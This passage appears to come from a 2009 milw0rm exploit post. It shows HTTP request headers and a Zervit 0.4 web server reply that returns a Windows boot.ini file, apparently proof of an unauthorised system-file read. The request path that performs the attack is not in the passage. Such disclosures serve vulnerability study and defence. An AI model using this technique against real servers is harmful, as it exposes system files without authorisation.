Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Connection: Keep-Alive, TE
TE: deflate, gzip, chunked, identity, trailers
#################################################
[Response]
HTTP/1.1 200 OK
Server: Zervit 0.4
X-Powered-By: Carbono
Connection: close
Accept-Ranges: bytes
Content-Type: application/octet-stream
Content-Length: 355
[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /NOEXECUTE=OPTIN /FASTDETECT
##################################################
# milw0rm.com [2009-05-13]